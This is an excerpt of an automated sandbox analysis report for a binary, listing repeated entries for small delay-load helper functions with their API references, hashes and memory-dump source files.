Opcode Fuzzy Hash: f3514ec6ab21105b1c5f99d6ad1a31a55b5fca6187472484963ba6ad40d10247
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D93D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: bd2a3cfb95c33c0bea5f7c60860a2a5d6dc13c365ee57cef0930e9de437d688b
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: bd2a3cfb95c33c0bea5f7c60860a2a5d6dc13c365ee57cef0930e9de437d688b
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D91F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: eb1e05a583081b4a70a86793e2b3337bd3c3914460e77b224dbacaffabf055fa
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: eb1e05a583081b4a70a86793e2b3337bd3c3914460e77b224dbacaffabf055fa
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: f518a36d806768977c328f24e4e262664c50be38607792580f9f4d1c4194360a
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: f518a36d806768977c328f24e4e262664c50be38607792580f9f4d1c4194360a
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0fb64f451ea350698a8bc9b0b63035a06065510292c846beb4df4fe4588a7959
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: 0fb64f451ea350698a8bc9b0b63035a06065510292c846beb4df4fe4588a7959
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072D8A3

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a5a123fe190f0758fbd283ba5fc5bcc0f53dcc1cbe728994ee145e78b9438b1b
Instruction ID: 95f3f35bcbe5c1ae8cc89d63b71b824bec70ff1ced7023085274504e9eb14d05
Opcode Fuzzy Hash: a5a123fe190f0758fbd283ba5fc5bcc0f53dcc1cbe728994ee145e78b9438b1b
Instruction Fuzzy Hash: F2A011E2AAC022BC30282200BE0AC3A022CC8C0B20330880AB80AA00C0EA88AE080830

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAF2 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 40e53729e20323fa8e4b538cf0dad357ee83a58103922577357d8d5d8e61742d
Instruction ID: 03c69f3615fd13a12d03265a93f91ad507a0450586863d3bce8fb37f92d4c448
Opcode Fuzzy Hash: 40e53729e20323fa8e4b538cf0dad357ee83a58103922577357d8d5d8e61742d
Instruction Fuzzy Hash: F5A001E66AD522BC312C7296BE1AD3A026CC4C4B613308A5AB81B94089AA8C9D495875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAFC Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d04c388c01f1904c1a7458a74eecb4ffd178dca44a6e5a2d3d51d46ea5352918
Instruction ID: 03c69f3615fd13a12d03265a93f91ad507a0450586863d3bce8fb37f92d4c448
Opcode Fuzzy Hash: d04c388c01f1904c1a7458a74eecb4ffd178dca44a6e5a2d3d51d46ea5352918
Instruction Fuzzy Hash: F5A001E66AD522BC312C7296BE1AD3A026CC4C4B613308A5AB81B94089AA8C9D495875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAE8 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fd6b1cbaaf0ffff289ae57b417784d1aa82fc2cc8fe0955ac22f2cb06ec7c69d
Instruction ID: 03c69f3615fd13a12d03265a93f91ad507a0450586863d3bce8fb37f92d4c448
Opcode Fuzzy Hash: fd6b1cbaaf0ffff289ae57b417784d1aa82fc2cc8fe0955ac22f2cb06ec7c69d
Instruction Fuzzy Hash: F5A001E66AD522BC312C7296BE1AD3A026CC4C4B613308A5AB81B94089AA8C9D495875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAC0 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: df2dce934a10f22b90bb9b5980c52030270a4e3413e383fde7f9c13dc9205fc8
Instruction ID: 03c69f3615fd13a12d03265a93f91ad507a0450586863d3bce8fb37f92d4c448
Opcode Fuzzy Hash: df2dce934a10f22b90bb9b5980c52030270a4e3413e383fde7f9c13dc9205fc8
Instruction Fuzzy Hash: F5A001E66AD522BC312C7296BE1AD3A026CC4C4B613308A5AB81B94089AA8C9D495875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DACA Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9cdf62a8d1b5cbb062fbd9169608452e6b6bcd5ca65ee5d2b523ddeee8863ae5
Instruction ID: 03c69f3615fd13a12d03265a93f91ad507a0450586863d3bce8fb37f92d4c448
Opcode Fuzzy Hash: 9cdf62a8d1b5cbb062fbd9169608452e6b6bcd5ca65ee5d2b523ddeee8863ae5
Instruction Fuzzy Hash: F5A001E66AD522BC312C7296BE1AD3A026CC4C4B613308A5AB81B94089AA8C9D495875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DAA5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DAB2

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 0e0d88628f72c64acf47b9bbf1c947c544c85d71441394097942c23dad8d577f
Instruction ID: 110518f68da66bc8cf19cae4024be98ec103ed72826ff037bb9fa6812e7ba491
Opcode Fuzzy Hash: 0e0d88628f72c64acf47b9bbf1c947c544c85d71441394097942c23dad8d577f
Instruction Fuzzy Hash: 6FA002D576D5117C315C7155BD16D3A026CD4D0B11330855AB41794045554C5D455875

Uniqueness

Uniqueness Score: -1.00%

Function 0072DBF7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d6685299d2ebbfe23cb9802374be628efb9fc383171b7f0e31912dea2251949d
Instruction ID: 5fb6080343d4b23a9f21af9cf363ed67836b75943bdcb0491a8de30312b70860
Opcode Fuzzy Hash: d6685299d2ebbfe23cb9802374be628efb9fc383171b7f0e31912dea2251949d
Instruction Fuzzy Hash: E2A001EA2AD126BC312862657E2BD7A022CD4C4B65B31891AB91A94081AA989D495435

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DC36

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8e4ec85880de92a127d42e739d909e7f42006810a2de968e42871cff0f82a9bd
Instruction ID: 3b22b43e69716604cc602a7479083d1de3e8f9bb7394e0d950da40191f92a1e6
Opcode Fuzzy Hash: 8e4ec85880de92a127d42e739d909e7f42006810a2de968e42871cff0f82a9bd
Instruction Fuzzy Hash: 76A001EA6AD222BD312C62557E1AD7A022CC4C8B61770891AB91AA4091AA88AD899435

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DC36

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d95a431e9dd941fbec249eb66bdc966d057835eb7df5ac3c76f336e75533bb8e
Instruction ID: 3b22b43e69716604cc602a7479083d1de3e8f9bb7394e0d950da40191f92a1e6
Opcode Fuzzy Hash: d95a431e9dd941fbec249eb66bdc966d057835eb7df5ac3c76f336e75533bb8e
Instruction Fuzzy Hash: 76A001EA6AD222BD312C62557E1AD7A022CC4C8B61770891AB91AA4091AA88AD899435

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC15 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d29e3d52495b77be47350f33a07787ac83962dc8c69a566e8c07d48c9b52324
Instruction ID: 5fb6080343d4b23a9f21af9cf363ed67836b75943bdcb0491a8de30312b70860
Opcode Fuzzy Hash: 6d29e3d52495b77be47350f33a07787ac83962dc8c69a566e8c07d48c9b52324
Instruction Fuzzy Hash: E2A001EA2AD126BC312862657E2BD7A022CD4C4B65B31891AB91A94081AA989D495435

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC1F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

Source File: 00000000.00000002.1624921819.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1624904165.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624947761.0000000000743000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000754000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1624963476.0000000000771000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1625015077.0000000000772000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_PMDfwr7Jal.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5046bb5f681fea511ed753f3a558f18422d465d2a1390b4546464b1c4d2fa603
Instruction ID: 5fb6080343d4b23a9f21af9cf363ed67836b75943bdcb0491a8de30312b70860
Opcode Fuzzy Hash: 5046bb5f681fea511ed753f3a558f18422d465d2a1390b4546464b1c4d2fa603
Instruction Fuzzy Hash: E2A001EA2AD126BC312862657E2BD7A022CD4C4B65B31891AB91A94081AA989D495435

Uniqueness

Uniqueness Score: -1.00%

Function 0072DC0B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0072DBD5

Part of subcall function 0072DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0072DFD6
Part of subcall function 0072DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0072DFE7

Memory Dump Source

